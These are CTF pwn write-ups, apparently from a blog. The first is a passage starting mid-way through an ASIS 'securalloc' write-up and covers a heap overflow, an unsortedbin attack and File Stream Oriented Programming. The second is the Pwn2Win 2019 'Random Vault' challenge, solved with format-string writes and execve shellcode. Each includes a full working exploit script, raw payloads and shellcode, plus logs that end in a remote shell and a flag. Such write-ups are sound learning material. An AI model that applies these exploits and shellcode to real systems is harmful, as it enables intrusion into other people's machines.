This isn’t exactly house of orange, house of orange usually is used when there isn’t a possibility of using a free by forcing the heap to expand by triggering sysmalloc when the top_chunk has no more space to allocate freeing the topchunk…

In our case we just want to convert the freed 0x60 sized chunk we freed previously into a smallbin.

When there is a large request(largebin size is enough) of malloc, a consolidation happens in order to prevent fragmentation. Every fastbin is moved to the unsortedbin, consolidates if possible, and finally goes to smallbin.

Later we use an unsortedbin attack with File Stream Oriented Programming to get a system(‘/bin/sh’) shell.

So this is the moment right before we allocate a chunk of 0x3e0 (0x3e0+0x10 > 1000 in decimal):

Now after executing malloc this fastbin chunk will be transformed into a smallbin:

File Stream Oriented Programming

We know that ROP can be used to hijack the control flow of the program, this can also be achieved by using file stream oriented programming but this one is achieved through an attack at File Stream.

We need to first understand malloc error message, which malloc_printerr is the function used to print the error:

if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
    errstr = "malloc(): memory corruption (fast)";
    errout:
    malloc_printerr (check_action, errstr, chunk2mem (victim), av);
    return NULL;
}

the function is calls __libc_message after the abort function is called. The structure inside is used here, and the method of calling the virtual table is triggered.

abort -> _IO_flush_all_lockp -> _IO_list_all

We can use the heap overflow to change the smallbin bk and implement the unsortbin attack, bk address should point to _IO_list_all -0x10 so we can corrupt _IO_list_all.

In the end the unsortedbin attack will change the pointer of _IO_list_all into a location in main_arena, which will make _chain pointer of _IO_list_all to a fake IO_FILE (This fake IO_FILE will be located in heap).

Here is how _IO_list_all looks in memory:

pwndbg> p *((struct _IO_FILE_plus*)0x7f742fb8db78)
$13 = {
  file = {
    _flags = 0xf12befc0, 
    _IO_read_ptr = 0x559af129d4f0 "", 
    _IO_read_end = 0x559af129d4f0 "", 
    _IO_read_base = 0x7f742fb8e510 "", 
    _IO_write_base = 0x7f742fb8db88  "\360\324)\361\232U", 
    _IO_write_ptr = 0x7f742fb8db88  "\360\324)\361\232U", 
    _IO_write_end = 0x7f742fb8db98  "\210?/t\177", 
    _IO_buf_base = 0x7f742fb8db98  "\210?/t\177", 
    _IO_buf_end = 0x7f742fb8dba8  "\230?/t\177", 
    _IO_save_base = 0x7f742fb8dba8  "\230?/t\177", 
    _IO_backup_base = 0x7f742fb8dbb8  "\250?/t\177", 
    _IO_save_end = 0x7f742fb8dbb8  "\250?/t\177", 
    _markers = 0x7f742fb8dbc8 , 
    _chain = 0x7f742fb8dbc8 , 
    _fileno = 0x2fb8dbd8, 
    _flags2 = 0x7f74, 
    _old_offset = 0x7f742fb8dbd8, 
    _cur_column = 0xdbe8, 
    _vtable_offset = 0xb8, 
    _shortbuf = "/", 
    _lock = 0x7f742fb8dbe8 , 
    _offset = 0x7f742fb8dbf8, 
    _codecvt = 0x7f742fb8dbf8 , 
    _wide_data = 0x7f742fb8dc08 , 
    _freeres_list = 0x7f742fb8dc08 , 
    _freeres_buf = 0x7f742fb8dc18 , 
    __pad5 = 0x7f742fb8dc18, 
    _mode = 0x2fb8dc28, 
    _unused2 = "t\177\000\000(?/t\177\000\000\070?/t"...
  }, 
  vtable = 0x7f742fb8dc38 
}

We need to forge an IO file that meets some specifications:

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
   || (_IO_vtable_offset (fp) == 0
   && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
    > fp->_wide_data->_IO_write_base))
    ) && _IO_OVERFLOW (fp, EOF) == EOF)

Also need to change vtable address to a place we can control in this case I used a place on the heap.

We need then the _IO_OVERFLOW pointer to be setted to system, the fp header is set to /bin/sh.

we first allocate a chunk of size 0x0 but with the summation of securealloc the size will be 0x0+0x10 =0x10, this will create a small chunk and it’s going to be allocated in the space of the first chunk we freed taking up 0x10 of it’s space, and create a new unsortedbin as we can see below:

This is the payload we want to use:

payload = p64(HEAPCANARY) # rewrite canary to avoid security trigger
payload += "/bin/sh\x00" # fp header is set to **/bin/sh**
payload += p64(0x61) # chunk size
payload += p64(0xdeadbeef) # FD flags field
payload += p64(_IO_LIST_ALL-0x10) # BK point where we want to write
payload += p64(0) + p64(1) #_IO_write_base < _IO_write_ptr
payload += p64(0) * 18 # from _IO_read_ptr to __pad5
payload += p64(0) # fp->_mode <= 0
payload += p64(0) * 2 # unused
payload += p64(HEAP+0x100) # VTABLE ADDRESS
payload += p64(0) * 3 #OUR VTABLE starts here which is located at HEAPBASE+0x100
payload += p64(SYSTEM) # _IO_OVERFLOW overwritten with system

Creating the chunks:

1
2
3

add(0x0) # create 0x21 chunk
edit(payload) # overflow 0x21 chunk
add(0x10) # trigger _IO_OVERFLOW aka system('/bin/sh')

The data after the overflow:

The exploit is not very reliable and sometimes fails so I putted it in an infinite loop to avoid rerunning the script at failurers:

from pwn import *
host, port = "76.74.177.238", "9001"
filename = "./securalloc.elf"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc # get a docker container that runs libc-2.23 or LD_PRELOAD
else:
    libc = ELF('./libc.so.6')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def get_LIBC(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[4].split("-")[0],16)

def get_LIBALLOC(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[9].split("-")[0],16)

def debug(bp, labp=[]):
    script = ""
    PIE = get_PIE(r)
    LIBALLOC = get_LIBALLOC(r)
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    for x in labp:
        script += "b *0x%x\n"%(LIBALLOC+x)
    gdb.attach(r,gdbscript=script)

def add(size):
    r.sendlineafter('==========\n> ', '1')
    r.sendlineafter('Size: ', str(size))


def edit(data):
    r.sendlineafter('==========\n> ', '2')
    r.sendlineafter('Data: ', data)

def show():
    r.sendlineafter('==========\n> ', '3')


def delete():
    r.sendlineafter('==========\n> ', '4')


context.terminal = ['tmux', 'new-window']


def exploit():
    try:
        global r
        r = getConn()
        
        # leak libc and heap (_IO_2_1_stderr)
        if not args.REMOTE and args.GDB:
            debug([0xBFF,0xC67,0xC7D,0xC39,0xD45,0xB6E], [0xA0B])
        add(0x60)
        delete()
        add(0x30)

        show()
        r.recvuntil('Data: ')
        HEAPADDR = u64(r.recv(6).ljust(0x8,'\x00'))
        HEAP = HEAPADDR - 0xf0
        log.info("HEAPADDR 0x%x" % HEAPADDR)
        log.info("HEAP 0x%x" % HEAP)

        
        add(0x10)
        show()
        r.recvuntil('Data: ')
        IOFILEJUMPS = u64(r.recv(6).ljust(0x8,'\x00')) # _IO_file_jumps

        LIBC = IOFILEJUMPS - libc.symbols['_IO_file_jumps']
        _IO_LIST_ALL = LIBC + libc.symbols['_IO_list_all']
        SYSTEM = LIBC + libc.symbols['system']
        log.info("IO_file_jumps 0x%x" % IOFILEJUMPS)
        log.info("LIBC 0x%x" % LIBC)
        
        # leak heap canary (/dev/urandom buffer)
        add(0x140)
        add(0x8)
        show()
        HEAPCANARY = u64(r.recvline().rstrip()[-7::].rjust(0x8,'\x00'))
        log.info("HEAPCANARY 0x%x" % HEAPCANARY)

        # 3) HOUSE OF ORANGE
        
        add(0x3e0) # fastbin(0x80) goes to a smallbin because allocation is > 1000 (0x3e0+0x10 = 1008)
        payload = p64(HEAPCANARY)
        payload += "/bin/sh\x00"
        payload += p64(0x61) #size
        payload += p64(0xdeadbeef) # FD
        payload += p64(_IO_LIST_ALL-0x10) # BK
        payload += p64(0) + p64(1) #_IO_write_base < _IO_write_ptr
        payload += p64(0) * 18 # unused
        payload += p64(0) # fp->_mode <= 0
        payload += p64(0) * 2 # unused
        payload += p64(HEAP+0x100) # VTABLE ADDRESS
        payload += p64(0) * 3 #VTABLE
        payload += p64(SYSTEM)
        add(0x0)
        edit(payload)
        add(0x10)
        r.recvuntil('[vdso]\n')
        r.sendline('ls -ltah') # send ls command
        r.recvline_regex(r'\d\d:\d\d\s\.') # to check if ls ran succefully
        r.interactive()
        r.close()
        return True
    except EOFError, KeyboardInterrupt:
        r.close()
        return False
while not exploit():
    pass

Running it:

$ python securalloc.py REMOTE
[*] '/ctf/work/pwn/securalloc/securalloc.elf'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/ctf/work/pwn/securalloc/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 76.74.177.238 on port 9001: Done
[*] HEAPADDR 0x565285b230f0
[*] HEAP 0x565285b23000
[*] IO_file_jumps 0x7f1728c6b6e0
[*] LIBC 0x7f17288a8000
[*] HEAPCANARY 0x1ecb79a1e3203a00
[*] Closed connection to 76.74.177.238 port 9001
[+] Opening connection to 76.74.177.238 on port 9001: Done
[*] HEAPADDR 0x5643a10cb0f0
[*] HEAP 0x5643a10cb000
[*] IO_file_jumps 0x7fde0d99b6e0
[*] LIBC 0x7fde0d5d8000
[*] HEAPCANARY 0x816203195eb4af00
[*] Closed connection to 76.74.177.238 port 9001
[+] Opening connection to 76.74.177.238 on port 9001: Done
[*] HEAPADDR 0x55e2209950f0
[*] HEAP 0x55e220995000
[*] IO_file_jumps 0x7effb1b836e0
[*] LIBC 0x7effb17c0000
[*] HEAPCANARY 0xda7a7dfc7356dd00
[*] Switching to interactive mode
drwxr-xr-x 1 root root 4.0K Nov 13 12:35 ..
-r--r----- 1 root pwn    33 Aug 22 10:26 flag.txt
-r-xr-x--- 1 root pwn   10K Aug 22 09:08 chall
-r-xr-x--- 1 root pwn    37 Aug 22 05:02 redir.sh
$ cat flag.txt
ASIS{l3ft0v3r_ru1n3d_3v3ryth1ng}

[Pwn] Pwn2Win 2019 CTF - Random Vault

2019-11-11T05:44:54.000Z

Random Vault
303 points

Description:
While analysing data obtained through our cyber operations, our analysts have discovered an old service in HARPA
infrastructure. This service has been used to store the agency’s secrets, but it has been replaced by a more
sophisticated one after a few years. By mistake, this service remained available on Internet until December 2019,
when HARPA agents realized this flaw and took it down. We suspect this service is vulnerable. We need your help to
exploit its vulnerability and extract the secrets that are still kept on the server.
random_vault

Fast Solution

Use 1st format string to leak pie address
Use 2nd format string to modify Seed and QWORD_5000 to shellcode place.
Use shell codes jumps to manage to execute read syscall and write shellcode from the stdin.

Identifying the vulnerability

First thing to do is the check the security settings enabled:

$ checksec random_vault
[*] '/ctf/pwn/RandomVault/random_vault'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Full RELRO is enabled so the global offset table is read only which is a thing we need to take into consideration on this challenge. Also PIE is enabled too this means if we require to get an address of a function or a pointer to a specific address of the program we will need to get a leak to calculate the PIE base.

We can easily find a vulnerability in the username field:

Unfortunately we can only use twice, one when the program starts and one username change:

qword_4020 is set to a very large negative number, which prevents us from at every username change to revert the global back to its original value, well theoretically is possible but we only have 81 characters to do it, because of this it’s not possible to do it with 4 %hn‘s, instead we could do it with two %n‘s but it’s way too many characters to print, this would take hours so this option was discarded by me in the beginning.

Also something interesting happens on the usual function where the setvbuff functions are lying in:

mprotect is changing the protections settings from a region of memory at qword_5000 0x1000 bytes are now RWX this means in this region we can read, write and execute code.

Leaking pie

We have a format string vulnerability right at the start of the program so let’s leak some addresses with:

1	r.sendlineafter('Username: ','%7$lx\|%11$lx')

An address aligned with the PIE base is located at the 11 position the stack, also an address aligned with the stack addresses is located at the 7th but I didn’t require this one for my current solution.

One thing we could take from the store function:

Store function will store pointers from the stdin on random locations, which are generated based on a seed, we can control this seed by using format string, knowing those locations on that special memory region RWX we can modify qword_5000 pointer to one of them and execute our shellcode.

Here is a function I wrote in python to calculate the offsets with the seed 0:

def indices_with_seed_zero():
    from ctypes import cdll
    libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
    libc.srand(0)
    for x in xrange(7):
        v0 = libc.rand()
        q = ((v0 >> 0x38) + v0) & 0xff - ((v0 >> 0x1F) >> 0x18)
        print q*8

The output:

$ python random_vault.py 
824
1584
840
920
648
2040
592

So the locations that we are going to write are:

Index 0: PIE_BASE+824+0x5010
Index 1: PIE_BASE+1584+0x5010
Index 2: PIE_BASE+840+0x5010
Index 3: PIE_BASE+920+0x5010
Index 4: PIE_BASE+648+0x5010
Index 5: PIE_BASE+2040+0x5010
Index 6: PIE_BASE+592+0x5010

The format string code used to overwrite SEED and qword_5000:

SEED = PIE+0x5008
QWORD5000 = PIE+0x5000
unk_5010 = PIE+0x5010

LOW_QWORD4020 = unk_5010 & 0xf000 | 0x348
payload = '%29$ln' # Clear SEED
payload += '%{}x%30$hn'.format(LOW_QWORD4020)

s = payload
s += ' '*(40-len(payload))
s += p64(SEED)
s += p64(QWORD5000)

Index 0 and Index 2 are very near to each other! 0x10 byte apart, I used this to my advantage and manage to call a read syscall successfully.

First on index 0 I cleared RDI register and jumped to Index 2:

1
2
3

xor edi, edi ; clears rdi (we want to read from STDIN so we need this to be 0)
add rdx, 0x10 ; ads 0x10 to $rdx register which contains the address where we initially jumped
jmp rdx ; jumps to Index 2 shellcode

Finally we exchange R11 with RDX(size of bytes we want to read) and R11 with RSI (buffer we want to write), luckily RAX is already 0 which is the number of read sycall on linux at x64 :

1
2
3

xchg r11,rdx ; initial value of $r11 is 0x241 so we want this on rdx register 
xchg r11,rsi ; old value of $rdx is now at r11 this address is also the address right at the rip instruction
syscall ; read($rdi, $rsi, rdx) with $rax == 0

The code to this store this shellcode:

r.sendlineafter('4. Quit\n\n','2')
r.sendlineafter(': ', str(0xe2ff10c28348ff31)) # xor edi, edi ; add rdx, 0x10 ; jmp rdx 

for i in range(6):
    r.sendlineafter(': ', str(0x050ff38749d38749)) # xchg r11,rdx ; xchg r11,rsi ; syscall

Finally we can read from the STDIN the shellcode that will get us a shell:

mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
xor eax, eax
cdq
xor esi, esi
push rsp
pop rdi
mov al, 0x3b  ; sys_execve
syscall

Sending data from the stdin:

1
2
3

rip = p64(0x050ff38749d38749) # needs to be the code at #rip otherwise we get a segfault
shellcode = '\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05'
r.sendline(rip+shellcode)

The full exploit code:

from pwn import *
#from libc import time,time_t

host, port = "200.136.252.34", "1245"
filename = "./random_vault"
elf = ELF(filename)
context.arch = 'amd64'

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        if x < 0xffff:
            script += "b *0x%x\n"%(PIE+x)
        else:
            script += "b *0x%x\n"%(x)
    gdb.attach(r,gdbscript=script)

def indices_with_seed_zero():
    from ctypes import cdll
    libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
    libc.srand(0)
    for x in xrange(7):
        v0 = libc.rand()
        q = ((v0 >> 0x38) + v0) & 0xff - ((v0 >> 0x1F) >> 0x18)
        print q*8   

context.terminal = ['tmux', 'new-window']

r = getConn()

r.sendlineafter('Username: ','%7$lx|%11$lx')
r.recvuntil('Hello, ')
STACK = int(r.recvuntil('|')[:-1],16)
PIE = int(r.recvline().rstrip(),16) - 0x1750
SEED = PIE+0x5008
QWORD5000 = PIE+0x5000
unk_5010 = PIE+0x5010

log.info("LEAKED STACK 0x%x" % STACK)
log.info("LEAKED PIE 0x%x" % PIE)
log.info("LEAKED SEED 0x%x" % SEED)
log.info("LEAKED QWORD5000 0x%x" % QWORD5000)
log.info("LEAKED unk_5010 0x%x" % unk_5010)
r.sendlineafter('4. Quit\n\n','1')
#context.log_level = "debug"
shellcode = '\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05'

LOW_QWORD4020 = unk_5010 & 0xf000 | 0x348
payload = '%29$ln' # Clear SEED
payload += '%{}x%30$hn'.format(LOW_QWORD4020)

s = payload
s += ' '*(40-len(payload))
s += p64(SEED)
s += p64(QWORD5000)

r.sendlineafter('Username: ', s)
#r.recvuntil('\x20\x20\x32')

if not args.REMOTE and args.GDB:
    debug([0x16B5,0x1474,0x161F]) # 0x16B5,0x1474,15AC

r.sendlineafter('4. Quit\n\n','2')
r.sendlineafter(': ', str(0xe2ff10c28348ff31)) # xor edi, edi ; add rdx, 0x10 ; jmp rdx 

for i in range(6):
    r.sendlineafter(': ', str(0x050ff38749d38749)) # xchg r11,rdx ; xchg r11,rsi ; syscall

r.sendline(p64(0x050ff38749d38749)+shellcode)
r.interactive()
r.close()

Running it:

$ python random_vault.py REMOTE
[+] Opening connection to 200.136.252.34 on port 1245: Done
[*] LEAKED STACK 0x7ffeb091b470
[*] LEAKED PIE 0x55661a762000
[*] LEAKED SEED 0x55661a767008
[*] LEAKED QWORD5000 0x55661a767000
[*] LEAKED unk_5010 0x55661a767010
[*] Switching to interactive mode
You've stored the following secrets:
#1: 16356810799245229873, #2: 364777857225033545, #3: 364777857225033545, #4: 364777857225033545, #5: 364777857225033545, #6: 364777857225033545, #7: 364777857225033545
$ cat home/chall/flag
CTF-BR{_r4nd0m_1nd1c3s_m4ke_th3_ch4ll3nge_m0r3_fun_}